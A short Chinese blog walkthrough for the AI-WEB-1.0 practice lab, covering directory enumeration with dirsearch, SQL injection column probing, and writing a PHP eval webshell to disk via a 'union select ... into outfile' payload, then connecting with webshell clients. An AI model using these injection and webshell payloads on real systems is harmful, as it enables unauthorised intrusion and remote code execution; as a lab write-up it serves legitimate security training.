CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
不秃的开发媛3 分钟前
Java开发入门指南:IDE选择与数据库连接详解
java·数据库·ide
专注API从业者3 分钟前
Scrapy 集成 JD API:一种高效且合规的商品数据采集方案
大数据·数据库·scrapy
掘金安东尼9 分钟前
CSS 颜色混乱实验
前端·javascript·github
好多1710 分钟前
《Redis的缓存策略》
数据库·redis·缓存
Zhen (Evan) Wang11 分钟前
.NET 6 文件下载
java·前端·.net
前端码农.14 分钟前
Element Plus 数字输入框箭头隐藏方案
前端·vue.js
李游Leo20 分钟前
npm / yarn / pnpm 包管理器对比与最佳实践(含国内镜像源配置与缓存优化)
前端·缓存·npm
Mintopia31 分钟前
轻量化AIGC模型在移动端Web应用的适配技术
前端·javascript·aigc
Mintopia31 分钟前
Next.js CI/CD 基础(GitHub Actions)
前端·javascript·next.js
RTC老炮34 分钟前
webrtc弱网-AlrDetector类源码分析与算法原理
服务器·网络·算法·php·webrtc